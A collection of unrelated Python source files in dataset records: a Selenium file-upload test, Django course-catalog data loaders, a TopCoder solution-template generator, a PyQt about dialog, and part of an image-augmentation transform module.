+{"seq_id":"570757611","text":"from selenium import webdriver\nfrom pathlib import Path\nimport platform\n\ndefaultUrls = {\n \"dev\": 'http://localhost:5000',\n \"production\": 'http://pmix-borrow-web.com'\n}\n\n\nbrowser = webdriver.Chrome()\nbrowser.get(defaultUrls[\"dev\"])\n\n\nsource_file_path_string = str(Path(\"test/static/Merge/input/source/translations-KER7-2018.10.02-v4-jef.xlsx\").resolve())\ntarget_file_path_string = str(Path(\"test/static/Merge/input/target/KER7-Female-Questionnaire-v4-jef.xlsx\").resolve())\nif platform.system() == 'Windows':\n source_file_path_string = source_file_path_string.replace(\"\\\\\", \"\\\\\\\\\")\n target_file_path_string = target_file_path_string.replace(\"\\\\\", \"\\\\\\\\\")\n\nsource_file_uploader = browser.find_element_by_id(\"source-file\")\nsource_file_uploader.send_keys(source_file_path_string)\ntarget_file_uploader = browser.find_element_by_id(\"target-file\")\ntarget_file_uploader.send_keys(target_file_path_string)\n\nbutton_submit = browser.find_element_by_id(\"btn-submit\")\nbutton_submit.click()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"300930987","text":"\"\"\"Course catalog data loaders\"\"\"\nimport logging\n\nfrom django.conf import settings\nfrom django.db import transaction\nfrom django.db.models import OuterRef, Exists\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom course_catalog.constants import PrivacyLevel, ListType\nfrom course_catalog.etl.exceptions import ExtractException\nfrom course_catalog.etl.utils import log_exceptions\nfrom course_catalog.models import (\n Course,\n CourseInstructor,\n CoursePrice,\n CourseTopic,\n LearningResourceRun,\n LearningResourceOfferor,\n Program,\n ProgramItem,\n Video,\n VideoChannel,\n Playlist,\n PlaylistVideo,\n UserList,\n UserListItem,\n ContentFile,\n)\nfrom course_catalog.utils import load_course_blacklist, load_course_duplicates\nfrom course_catalog.etl.deduplication import get_most_relevant_run\nfrom search import task_helpers as search_task_helpers\nfrom search.constants import COURSE_TYPE\n\nlog = logging.getLogger()\n\nUser = get_user_model()\n\n\ndef load_topics(resource, topics_data):\n \"\"\"Load the topics for a resource into the database\"\"\"\n topics = []\n\n for topic_data in topics_data:\n topic, _ = CourseTopic.objects.get_or_create(name=topic_data[\"name\"])\n topics.append(topic)\n\n resource.topics.set(topics)\n resource.save()\n return topics\n\n\ndef load_prices(resource, prices_data):\n \"\"\"Load the prices for a resource into the database\"\"\"\n prices = []\n\n for price_data in prices_data:\n price, _ = CoursePrice.objects.get_or_create(\n price=price_data.get(\"price\", \"\"),\n mode=price_data.get(\"mode\", \"\"),\n upgrade_deadline=price_data.get(\"upgrade_deadline\", None),\n )\n prices.append(price)\n\n resource.prices.set(prices)\n resource.save()\n return prices\n\n\ndef load_instructors(resource, instructors_data):\n \"\"\"Load the prices for a resource into the database\"\"\"\n instructors = []\n\n for instructor_data in instructors_data:\n instructor, _ = CourseInstructor.objects.get_or_create(**instructor_data)\n instructors.append(instructor)\n\n resource.instructors.set(instructors)\n resource.save()\n return instructors\n\n\ndef load_offered_bys(resource, offered_bys_data):\n \"\"\"Loads a list of offered_by into the resource. This operation is additive-only.\"\"\"\n offered_bys = []\n\n for offered_by_data in offered_bys_data:\n offered_by, _ = LearningResourceOfferor.objects.get_or_create(\n name=offered_by_data[\"name\"]\n )\n resource.offered_by.add(offered_by)\n\n resource.save()\n return offered_bys\n\n\ndef load_run(learning_resource, course_run_data):\n \"\"\"Load the course run into the database\"\"\"\n run_id = course_run_data.pop(\"run_id\")\n platform = course_run_data.get(\"platform\")\n instructors_data = course_run_data.pop(\"instructors\", [])\n prices_data = course_run_data.pop(\"prices\", [])\n topics_data = course_run_data.pop(\"topics\", [])\n offered_bys_data = course_run_data.pop(\"offered_by\", [])\n content_files = course_run_data.pop(\"content_files\", [])\n\n learning_resource_run, _ = LearningResourceRun.objects.update_or_create(\n run_id=run_id,\n platform=platform,\n defaults={\n **course_run_data,\n \"object_id\": learning_resource.id,\n \"content_type\": ContentType.objects.get_for_model(learning_resource),\n },\n )\n\n load_topics(learning_resource_run, topics_data)\n load_prices(learning_resource_run, prices_data)\n load_instructors(learning_resource_run, instructors_data)\n load_offered_bys(learning_resource_run, offered_bys_data)\n load_content_files(learning_resource_run, content_files)\n\n return learning_resource_run\n\n\ndef load_course(course_data, blacklist, duplicates):\n \"\"\"Load the course into the database\"\"\"\n # pylint: disable=too-many-branches,too-many-locals\n\n course_id = course_data.pop(\"course_id\")\n runs_data = course_data.pop(\"runs\", [])\n topics_data = course_data.pop(\"topics\", [])\n offered_bys_data = course_data.pop(\"offered_by\", [])\n\n if course_id in blacklist:\n course_data[\"published\"] = False\n\n duplicates_record = next(\n (\n record\n for record in duplicates\n if course_id in record[\"duplicate_course_ids\"]\n ),\n None,\n )\n\n if duplicates_record:\n course = Course.objects.filter(course_id=duplicates_record[\"course_id\"]).first()\n if not course:\n course_data[\"course_id\"] = duplicates_record[\"course_id\"]\n course = Course.objects.create(**course_data)\n created = True\n else:\n created = False\n\n if course_id != duplicates_record[\"course_id\"]:\n duplicate_course = Course.objects.filter(course_id=course_id).first()\n if duplicate_course:\n duplicate_course.published = False\n duplicate_course.save()\n search_task_helpers.delete_course(duplicate_course)\n else:\n platform = course_data.get(\"platform\")\n course, created = Course.objects.update_or_create(\n platform=platform, course_id=course_id, defaults=course_data\n )\n\n run_ids_to_update_or_create = [run[\"run_id\"] for run in runs_data]\n\n for course_run_data in runs_data:\n load_run(course, course_run_data)\n\n if duplicates_record and not created:\n most_relevent_run = get_most_relevant_run(course.runs.all())\n\n if most_relevent_run.run_id in run_ids_to_update_or_create:\n for attr, val in course_data.items():\n setattr(course, attr, val)\n course.save()\n\n load_topics(course, topics_data)\n load_offered_bys(course, offered_bys_data)\n\n if not created and not course.published:\n search_task_helpers.delete_course(course)\n elif course.published:\n search_task_helpers.upsert_course(course.id)\n\n return course\n\n\n@log_exceptions(\"Error loading courses\")\ndef load_courses(courses_data):\n \"\"\"Load a list of programs\"\"\"\n blacklist = load_course_blacklist()\n\n courses_list = list(courses_data or [])\n if len(courses_list) > 0:\n platform = courses_list[0].get(\"platform\")\n duplicates = load_course_duplicates(platform)\n else:\n duplicates = []\n\n return [load_course(course, blacklist, duplicates) for course in courses_list]\n\n\n@log_exceptions(\"Error loading program\")\ndef load_program(program_data, blacklist, duplicates):\n \"\"\"Load the program into the database\"\"\"\n # pylint: disable=too-many-locals\n\n program_id = program_data.pop(\"program_id\")\n courses_data = program_data.pop(\"courses\")\n topics_data = program_data.pop(\"topics\", [])\n runs_data = program_data.pop(\"runs\", [])\n offered_bys_data = program_data.pop(\"offered_by\", [])\n\n program, created = Program.objects.update_or_create(\n program_id=program_id, defaults=program_data\n )\n\n load_topics(program, topics_data)\n load_offered_bys(program, offered_bys_data)\n\n for run_data in runs_data:\n load_run(program, run_data)\n\n courses = []\n course_content_type = ContentType.objects.get(model=\"course\")\n\n for position, course_data in enumerate(courses_data):\n # skip courses that don't define a course_id\n if not course_data.get(\"course_id\", None):\n continue\n\n course = load_course(course_data, blacklist, duplicates)\n courses.append(course)\n\n # create a program item or update its position\n ProgramItem.objects.update_or_create(\n program=program,\n content_type=course_content_type,\n object_id=course.id,\n defaults={\"position\": position},\n )\n\n # remove courses from the program that are no longer\n program.items.filter(content_type=course_content_type).exclude(\n object_id__in=[course.id for course in courses]\n ).delete()\n\n if not created and not program.published:\n search_task_helpers.delete_program(program)\n elif program.published:\n search_task_helpers.upsert_program(program.id)\n\n return program\n\n\ndef load_programs(platform, programs_data):\n \"\"\"Load a list of programs\"\"\"\n blacklist = load_course_blacklist()\n duplicates = load_course_duplicates(platform)\n\n return [\n load_program(program_data, blacklist, duplicates)\n for program_data in programs_data\n ]\n\n\ndef load_video(video_data):\n \"\"\"Load a video into the database\"\"\"\n video_id = video_data.pop(\"video_id\")\n platform = video_data.pop(\"platform\")\n topics_data = video_data.pop(\"topics\", [])\n offered_bys_data = video_data.pop(\"offered_by\", [])\n runs_data = video_data.pop(\"runs\", [])\n\n video, created = Video.objects.update_or_create(\n video_id=video_id, platform=platform, defaults=video_data\n )\n\n load_topics(video, topics_data)\n load_offered_bys(video, offered_bys_data)\n\n for run_data in runs_data:\n load_run(video, run_data)\n\n if not created and not video.published:\n # NOTE: if we didn't see a video in a playlist, it is likely NOT being removed here\n # this gets addressed in load_channels after everything has been synced\n search_task_helpers.delete_video(video)\n elif video.published:\n search_task_helpers.upsert_video(video.id)\n\n return video\n\n\ndef load_videos(videos_data):\n \"\"\"\n Loads a list of videos data\n\n Args:\n videos_data (iter of dict): iterable of the video data\n\n Returns:\n list of Video:\n the list of loaded videos\n \"\"\"\n return [load_video(video_data) for video_data in videos_data]\n\n\ndef load_playlist_user_list(playlist, user_list_title):\n \"\"\"\n Load a playlist into a user list\n\n Args:\n playlist (Playlist): the playlist to generate a user list from\n user_list_title (str or None): title for the user list\n Returns:\n UserList or None:\n the created/updated user list or None\n \"\"\"\n owner_username = settings.OPEN_VIDEO_USER_LIST_OWNER\n if not owner_username:\n log.debug(\"OPEN_VIDEO_USER_LIST_OWNER is not set, skipping\")\n return None\n\n owner = User.objects.filter(username=owner_username).first()\n if owner is None:\n log.error(\n \"OPEN_VIDEO_USER_LIST_OWNER is set to '%s', but that user doesn't exist\",\n owner_username,\n )\n return None\n\n if not playlist.has_user_list:\n # if the playlist shouldn't have a user list, but it does, delete it\n if playlist.user_list:\n user_list = playlist.user_list\n search_task_helpers.delete_user_list(user_list)\n user_list.delete()\n return None\n\n # atomically ensure we create one and only one user list for this playlist\n with transaction.atomic():\n playlist = Playlist.objects.select_for_update().get(id=playlist.id)\n if not playlist.user_list:\n playlist.user_list = UserList.objects.create(\n author=owner,\n privacy_level=PrivacyLevel.public.value,\n list_type=ListType.LIST.value,\n )\n playlist.save()\n\n user_list = playlist.user_list\n user_list.title = user_list_title if user_list_title else playlist.title\n user_list.save()\n\n video_content_type = ContentType.objects.get_for_model(Video)\n\n items = []\n for playlist_video in playlist.playlist_videos.order_by(\"position\"):\n item, _ = UserListItem.objects.update_or_create(\n user_list=user_list,\n content_type=video_content_type,\n object_id=playlist_video.video_id,\n defaults={\"position\": playlist_video.position},\n )\n items.append(item)\n\n # prune any items from the previous state\n UserListItem.objects.filter(user_list=user_list).exclude(\n id__in=[item.id for item in items]\n ).delete()\n\n search_task_helpers.upsert_user_list(user_list.id)\n\n return user_list\n\n\ndef load_playlist(video_channel, playlist_data):\n \"\"\"\n Load a playlist\n\n Args:\n video_channel (VideoChannel): the video channel instance this playlist is under\n playlist_data (dict): the video playlist\n\n Returns:\n Playlist:\n the created or updated playlist\n \"\"\"\n platform = playlist_data.pop(\"platform\")\n playlist_id = playlist_data.pop(\"playlist_id\")\n videos_data = playlist_data.pop(\"videos\", [])\n topics_data = playlist_data.pop(\"topics\", [])\n offered_by_data = playlist_data.pop(\"offered_by\", [])\n user_list_title = playlist_data.pop(\"user_list_title\", None)\n\n playlist, _ = Playlist.objects.update_or_create(\n platform=platform,\n playlist_id=playlist_id,\n defaults={\"channel\": video_channel, **playlist_data},\n )\n\n load_topics(playlist, topics_data)\n load_offered_bys(playlist, offered_by_data)\n\n videos = load_videos(videos_data)\n\n # atomically remove existing videos in the playlist and add the current ones in bulk\n with transaction.atomic():\n for position, video in enumerate(videos):\n PlaylistVideo.objects.update_or_create(\n playlist=playlist, video=video, defaults={\"position\": position}\n )\n PlaylistVideo.objects.filter(playlist=playlist).exclude(\n video_id__in=[video.id for video in videos]\n ).delete()\n\n load_playlist_user_list(playlist, user_list_title)\n\n from course_catalog import tasks\n\n tasks.get_video_topics.delay(video_ids=[video.id for video in videos])\n\n return playlist\n\n\ndef load_playlists(video_channel, playlists_data):\n \"\"\"\n Load a list of channel playlists\n\n Args:\n video_channel (VideoChannel): the video channel instance this playlist is under\n playlists_data (iter of dict): iterable of the video playlists\n\n\n Returns:\n list of Playlist:\n the created or updated playlists\n \"\"\"\n playlists = [\n load_playlist(video_channel, playlist_data) for playlist_data in playlists_data\n ]\n playlist_ids = [playlist.id for playlist in playlists]\n\n # remove playlists that no longer exist\n playlists_to_unpublish = Playlist.objects.filter(channel=video_channel).exclude(\n id__in=playlist_ids\n )\n\n for playlist in playlists_to_unpublish.filter(has_user_list=True):\n user_list = playlist.user_list\n if user_list:\n search_task_helpers.delete_user_list(user_list)\n user_list.delete()\n\n playlists_to_unpublish.update(published=False, has_user_list=False)\n\n return playlists\n\n\ndef load_video_channel(video_channel_data):\n \"\"\"\n Load a single video channel\n\n Arg:\n video_channel_data (dict):\n the normalized video channel data\n Returns:\n VideoChannel:\n the updated or created video channel\n \"\"\"\n platform = video_channel_data.pop(\"platform\")\n channel_id = video_channel_data.pop(\"channel_id\")\n playlists_data = video_channel_data.pop(\"playlists\", [])\n topics_data = video_channel_data.pop(\"topics\", [])\n offered_by_data = video_channel_data.pop(\"offered_by\", [])\n\n video_channel, _ = VideoChannel.objects.update_or_create(\n platform=platform, channel_id=channel_id, defaults=video_channel_data\n )\n\n load_topics(video_channel, topics_data)\n load_offered_bys(video_channel, offered_by_data)\n load_playlists(video_channel, playlists_data)\n\n return video_channel\n\n\ndef load_video_channels(video_channels_data):\n \"\"\"\n Load a list of video channels\n\n Args:\n video_channels_data (iter of dict): iterable of the video channels data\n\n Returns:\n list of VideoChannel:\n list of the loaded videos\n \"\"\"\n video_channels = []\n\n # video_channels_data is a generator\n for video_channel_data in video_channels_data:\n channel_id = video_channel_data[\"channel_id\"]\n try:\n video_channel = load_video_channel(video_channel_data)\n except ExtractException:\n # video_channel_data has lazily evaluated generators, one of them could raise an extraction error\n # this is a small pollution of separation of concerns\n # but this allows us to stream the extracted data w/ generators\n # as opposed to having to load everything into memory, which will eventually fail\n log.exception(\n \"Error with extracted video channel: channel_id=%s\", channel_id\n )\n else:\n video_channels.append(video_channel)\n\n # unpublish the channels we're no longer tracking\n channel_ids = [channel for channel in video_channels_data]\n VideoChannel.objects.exclude(channel_id__in=channel_ids).update(published=False)\n\n # finally, unpublish any published videos that aren't in at least one published playlist\n for video in (\n Video.objects.annotate(\n in_published_playlist=Exists(\n PlaylistVideo.objects.filter(\n video_id=OuterRef(\"pk\"), playlist__published=True\n )\n )\n )\n .filter(published=True)\n .exclude(in_published_playlist=True)\n ):\n # remove it from the index first\n search_task_helpers.delete_video(video)\n video.published = False\n video.save()\n\n return video_channels\n\n\ndef load_content_file(course_run, content_file_data):\n \"\"\"\n Sync a course run file/page to the database\n\n Args:\n course_run (LearningResourceRun): a LearningResourceRun for a Course\n content_file_data (dict): File metadata as JSON\n\n Returns:\n ContentFile: the object that was created or updated\n \"\"\"\n try:\n content_file, _ = ContentFile.objects.update_or_create(\n run=course_run, key=content_file_data.get(\"key\"), defaults=content_file_data\n )\n return content_file\n except: # pylint: disable=bare-except\n log.exception(\n \"ERROR syncing course file %s for run %d\",\n content_file_data.get(\"uid\", \"\"),\n course_run.id,\n )\n\n\ndef load_content_files(course_run, content_files_json):\n \"\"\"\n Sync all content files for a course run to database and S3 if not present in DB\n\n Args:\n course_run (LearningResourceRun): a course run\n content_files_json (dict): Details about the course run's content files\n\n Returns:\n list of ContentFile: ContentFile objects that were created/updated\n\n \"\"\"\n if course_run.content_type and course_run.content_type.name == COURSE_TYPE:\n content_files = [\n load_content_file(course_run, content_file)\n for content_file in content_files_json\n ]\n if course_run.published:\n search_task_helpers.index_run_content_files(course_run.id)\n else:\n search_task_helpers.delete_run_content_files(course_run.id)\n return content_files\n","sub_path":"course_catalog/etl/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":18966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"112576252","text":"# Copyright (c) 2011 Benaka Moorthi\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport stringtemplate3\nimport re\nimport os\nfrom tidylib import tidy_document\nfrom srmtrainer.utility.signature_functions import parse_method_sig, transform_cpp_type\nfrom srmtrainer.utility.etc import *\n\nclass SolutionGenerator:\n\n templates = {\n 'cpp': 'problem.cpp'\n }\n\n sig_type_converters = {\n 'cpp': transform_cpp_type\n }\n\n def __init__(self, conf):\n self._conf = conf\n\n def generate(self, out_path, lang, srm, problem=None):\n template_to_use = None\n type_converter = None\n\n problems = None\n if problem:\n problems = [problem]\n else:\n srm.order_problems()\n problems = srm.problems\n\n template_file = None\n try:\n type_converter = SolutionGenerator.sig_type_converters[lang]\n template_file_name = SolutionGenerator.templates[lang]\n template_path = self._conf.app_data_join(template_file_name)\n\n if not os.path.isfile(template_path):\n self._conf.init_data_file(template_file_name)\n\n template_file = open(template_path, 'r')\n template_to_use = stringtemplate3.StringTemplate(template_file.read())\n finally:\n if template_file:\n template_file.close()\n\n problem_array = []\n for p in problems:\n (result_type, param_types) = parse_method_sig(p.method_sig, keep_param_names=True)\n\n param_types = [(type_converter(param[0]), param[1]) for param in param_types]\n\n # create method sig\n method_sig = type_converter(result_type) + ' ' + p.method_name + '('\n method_sig += ', '.join(['%s %s' % param for param in param_types])\n method_sig += ')'\n\n # create statement\n brs_removed = re.sub(r'\\s*<[Bb][Rr]\\s*/>\\s*', '\\n\\n', p.statement)\n brs_removed = re.sub(r'\\s*<[Bb][Rr]\\s*>\\s*[Bb][Rr]\\s*>', '\\n\\n', brs_removed)\n \n paragraphed = []\n for sect in re.split(r'[\\r\\n]+', brs_removed):\n paragraphed[len(paragraphed):] = ['', sect, '
']\n paragraphed = ''.join(paragraphed)\n\n document, errors = tidy_document(\n paragraphed, options={'show-body-only': True, 'wrap': 76, 'indent': True, 'vertical-space': True})\n document = re.sub(r'?p/?>\\n', '', str(document))\n statement = unescape_html(document.replace('\\n', '\\n//! '))\n\n # assign properties for problem\n problem_array[len(problem_array):] = [{\n 'level': p.level,\n 'statement': statement,\n 'type_name': p.type_name,\n 'method_sig': method_sig\n }]\n\n template_to_use['srm'] = {'problems': problem_array, 'title': srm.title}\n\n out = None\n try:\n out = open(out_path, 'w')\n out.write(str(template_to_use))\n finally:\n if out:\n out.close()\n\n","sub_path":"src/srmtrainer/gen/solution_generator.py","file_name":"solution_generator.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"322799191","text":"import os\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QDialog\nimport webbrowser\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom GUI.Ui_about import Ui_About\n\n\nclass About(QDialog, Ui_About):\n\n def __init__(self, tag, parent=None):\n QDialog.__init__(self, parent)\n self.setupUi(self)\n self.__initLabel()\n self.__setUIStyle()\n\n @pyqtSlot()\n def on_commandLinkButton_clicked(self):\n print(\"open github\")\n webbrowser.open(\"https://github.com/ZxxWs/IdentifyBuilding\") # 打开GitHub网址\n\n def __initLabel(self):\n inforFile = os.getcwd() + \"\\\\Data\\\\aboutInfor.txt\"\n with open(inforFile, 'r', encoding=\"utf8\") as file:\n infor = file.read()\n self.label.setText(infor)\n file.close()\n\n def __setUIStyle(self):\n self.setWindowModality(Qt.ApplicationModal) # 设置其他界面不可点击\n\n self.setWindowIcon(QIcon('ArtRes/about.png'))\n self.setStyleSheet(\"QDialog{background-image:url(ArtRes/backgroudBlack.png)}\"\n \"QCommandLinkButton{color:#F5FFFA}\"\n \"QLabel{background-color:rgb(0,0,0,155)}\"\n \"QLabel{font-size:26px}\"\n \"QLabel{color:#F5FFFA}\"\n \"QLabel{border-radius: 17px}\"\n )\n","sub_path":"Code/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"190675799","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Copyright (c) BaseDetection, Inc. and its affiliates. All Rights Reserved\n\nimport inspect\nimport random\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Callable, TypeVar\n\nimport cv2\nimport numpy as np\nfrom PIL import Image, ImageFilter, ImageOps\nimport pycocotools.mask as mask_util\n\nimport torch\nimport torchvision.transforms as transforms\n\nimport cvpods\nfrom cvpods.structures import BoxMode\n\nfrom cvpods.data.transforms.transform_util import to_float_tensor, to_numpy\n\n__all__ = [\n \"JitterCropTransform\",\n \"HFlipTransform\",\n \"VFlipTransform\",\n \"NoOpTransform\",\n \"DistortTransform2\",\n \"ShiftTransform\",\n \"Transform\",\n \"ResizeTransform\",\n]\n\n\n# NOTE: to document methods in subclasses, it's sufficient to only document those whose\n# implemenation needs special attention.\n\n\nclass Transform(metaclass=ABCMeta):\n \"\"\"\n Base class for implementations of __deterministic__ transformations for\n image and other data structures. \"Deterministic\" requires that the output of\n all methods of this class are deterministic w.r.t their input arguments. In\n training, there should be a higher-level policy that generates (likely with\n random variations) these transform ops. Each transform op may handle several\n data types, e.g.: image, coordinates, segmentation, bounding boxes. Some of\n them have a default implementation, but can be overwritten if the default\n isn't appropriate. The implementation of each method may choose to modify\n its input data in-place for efficient transformation.\n \"\"\"\n\n def _set_attributes(self, params: list = None):\n \"\"\"\n Set attributes from the input list of parameters.\n\n Args:\n params (list): list of parameters.\n \"\"\"\n\n if params:\n for k, v in params.items():\n if k != \"self\" and not k.startswith(\"_\"):\n setattr(self, k, v)\n\n @abstractmethod\n def apply_image(self, img: np.ndarray):\n \"\"\"\n Apply the transform on an image.\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: image after apply the transformation.\n \"\"\"\n pass\n\n @abstractmethod\n def apply_coords(self, coords: np.ndarray):\n \"\"\"\n Apply the transform on coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is (x, y).\n\n Returns:\n ndarray: coordinates after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates on an image of\n shape (H, W) are in range [0, W] or [0, H].\n \"\"\"\n\n pass\n\n def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply the transform on a full-image segmentation.\n By default will just perform \"apply_image\".\n\n Args:\n segmentation (ndarray): of shape HxW. The array should have integer\n or bool dtype.\n\n Returns:\n ndarray: segmentation after apply the transformation.\n \"\"\"\n return self.apply_image(segmentation)\n\n def apply_box(self, box: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply the transform on an axis-aligned box.\n By default will transform the corner points and use their\n minimum/maximum to create a new axis-aligned box.\n Note that this default may change the size of your box, e.g. in\n rotations.\n\n Args:\n box (ndarray): Nx4 floating point array of XYXY format in absolute\n coordinates.\n Returns:\n ndarray: box after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates on an image of\n shape (H, W) are in range [0, W] or [0, H].\n \"\"\"\n # Indexes of converting (x0, y0, x1, y1) box into 4 coordinates of\n # ([x0, y0], [x1, y0], [x0, y1], [x1, y1]).\n idxs = np.array([(0, 1), (2, 1), (0, 3), (2, 3)]).flatten()\n coords = np.asarray(box).reshape(-1, 4)[:, idxs].reshape(-1, 2)\n coords = self.apply_coords(coords).reshape((-1, 4, 2))\n minxy = coords.min(axis=1)\n maxxy = coords.max(axis=1)\n trans_boxes = np.concatenate((minxy, maxxy), axis=1)\n return trans_boxes\n\n def apply_polygons(self, polygons: list) -> list:\n \"\"\"\n Apply the transform on a list of polygons, each represented by a Nx2\n array.\n By default will just transform all the points.\n\n Args:\n polygon (list[ndarray]): each is a Nx2 floating point array of\n (x, y) format in absolute coordinates.\n Returns:\n list[ndarray]: polygon after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates on an image of\n shape (H, W) are in range [0, W] or [0, H].\n \"\"\"\n return [self.apply_coords(p) for p in polygons]\n\n def apply_meta_infos(self, meta_infos: dict) -> dict:\n return meta_infos\n\n def __call__(self, image, annotations=None, **kwargs):\n \"\"\"\n Apply transfrom to images and annotations (if exist)\n \"\"\"\n image_size = image.shape[:2] # h, w\n image = self.apply_image(image)\n\n if annotations is not None:\n for annotation in annotations:\n if \"bbox\" in annotation:\n bbox = BoxMode.convert(\n annotation[\"bbox\"], annotation[\"bbox_mode\"],\n BoxMode.XYXY_ABS)\n # Note that bbox is 1d (per-instance bounding box)\n annotation[\"bbox\"] = self.apply_box([bbox])[0]\n annotation[\"bbox_mode\"] = BoxMode.XYXY_ABS\n\n if \"segmentation\" in annotation:\n # each instance contains 1 or more polygons\n segm = annotation[\"segmentation\"]\n if isinstance(segm, list):\n # polygons\n polygons = [np.asarray(p).reshape(-1, 2) for p in segm]\n annotation[\"segmentation\"] = [\n p.reshape(-1) for p in\n self.apply_polygons(polygons)\n ]\n elif isinstance(segm, dict):\n # RLE\n mask = mask_util.decode(segm)\n mask = self.apply_segmentation(mask)\n assert tuple(mask.shape[:2]) == image_size\n annotation[\"segmentation\"] = mask\n else:\n raise ValueError(\n \"Cannot transform segmentation of type '{}'!\"\n \"Supported types are: polygons as list[list[float] or ndarray],\"\n \" COCO-style RLE as a dict.\".format(type(segm)))\n\n if \"keypoints\" in annotation:\n \"\"\"\n Transform keypoint annotation of an image.\n\n Args:\n keypoints (list[float]): Nx3 float in cvpods Dataset format.\n transforms (TransformList):\n image_size (tuple): the height, width of the transformed image\n keypoint_hflip_indices (ndarray[int]): see `create_keypoint_hflip_indices`.\n \"\"\"\n # (N*3,) -> (N, 3)\n keypoints = annotation[\"keypoints\"]\n keypoints = np.asarray(keypoints, dtype=\"float64\").reshape(\n -1, 3)\n keypoints[:, :2] = self.apply_coords(keypoints[:, :2])\n\n # This assumes that HorizFlipTransform is the only one that does flip\n do_hflip = isinstance(self,\n cvpods.data.transforms.transform.HFlipTransform)\n\n # Alternative way: check if probe points was horizontally flipped.\n # probe = np.asarray([[0.0, 0.0], [image_width, 0.0]])\n # probe_aug = transforms.apply_coords(probe.copy())\n # do_hflip = np.sign(probe[1][0] - probe[0][0]) != np.sign(probe_aug[1][0] - probe_aug[0][0]) # noqa\n\n # If flipped, swap each keypoint with its opposite-handed equivalent\n if do_hflip:\n if \"keypoint_hflip_indices\" in kwargs:\n keypoints = keypoints[\n kwargs[\"keypoint_hflip_indices\"], :]\n\n # Maintain COCO convention that if visibility == 0, then x, y = 0\n # TODO may need to reset visibility for cropped keypoints,\n # but it does not matter for our existing algorithms\n keypoints[keypoints[:, 2] == 0] = 0\n\n annotation[\"keypoints\"] = keypoints\n\n # For sem seg task\n if \"sem_seg\" in annotation:\n sem_seg = annotation[\"sem_seg\"]\n if isinstance(sem_seg, np.ndarray):\n sem_seg = self.apply_segmentation(sem_seg)\n assert tuple(sem_seg.shape[:2]) == tuple(\n image.shape[:2]), (\n f\"Image shape is {image.shape[:2]}, \"\n f\"but sem_seg shape is {sem_seg.shape[:2]}.\"\n )\n annotation[\"sem_seg\"] = sem_seg\n else:\n raise ValueError(\n \"Cannot transform segmentation of type '{}'!\"\n \"Supported type is ndarray.\".format(type(sem_seg)))\n\n if \"meta_infos\" in annotation:\n meta_infos = annotation[\"meta_infos\"]\n meta_infos = self.apply_meta_infos(meta_infos)\n annotation[\"meta_infos\"] = meta_infos\n return image, annotations\n\n @classmethod\n def register_type(cls, data_type: str, func: Callable):\n \"\"\"\n Register the given function as a handler that this transform will use\n for a specific data type.\n\n Args:\n data_type (str): the name of the data type (e.g., box)\n func (callable): takes a transform and a data, returns the\n transformed data.\n\n Examples:\n\n .. code-block:: python\n\n def func(flip_transform, voxel_data):\n return transformed_voxel_data\n HFlipTransform.register_type(\"voxel\", func)\n\n # ...\n transform = HFlipTransform(...)\n transform.apply_voxel(voxel_data) # func will be called\n \"\"\"\n assert callable(\n func\n ), \"You can only register a callable to a Transform. Got {} instead.\".format(\n func)\n argspec = inspect.getfullargspec(func)\n assert len(argspec.args) == 2, (\n \"You can only register a function that takes two positional \"\n \"arguments to a Transform! Got a function with spec {}\".format(\n str(argspec)))\n setattr(cls, \"apply_\" + data_type, func)\n\n\n_T = TypeVar(\"_T\")\n\n\nclass JitterCropTransform(Transform):\n \"\"\"JitterCrop data augmentation used in YOLOv4.\n\n Notes:\n - Rewrite as Yolo.\n - A different method to crop image\n\n Steps:\n - 1. get random offset of four boundary\n - 2. get target crop size\n - 3. get target crop image\n - 4. filter bbox by valid region\n\n Args:\n pleft (int): left offset.\n pright (int): right offset.\n ptop (int): top offset.\n pbot (int): bottom offset.\n output_size (tuple(int)): output size (w, h).\n \"\"\"\n\n def __init__(self, pleft, pright, ptop, pbot, output_size):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Args:\n img 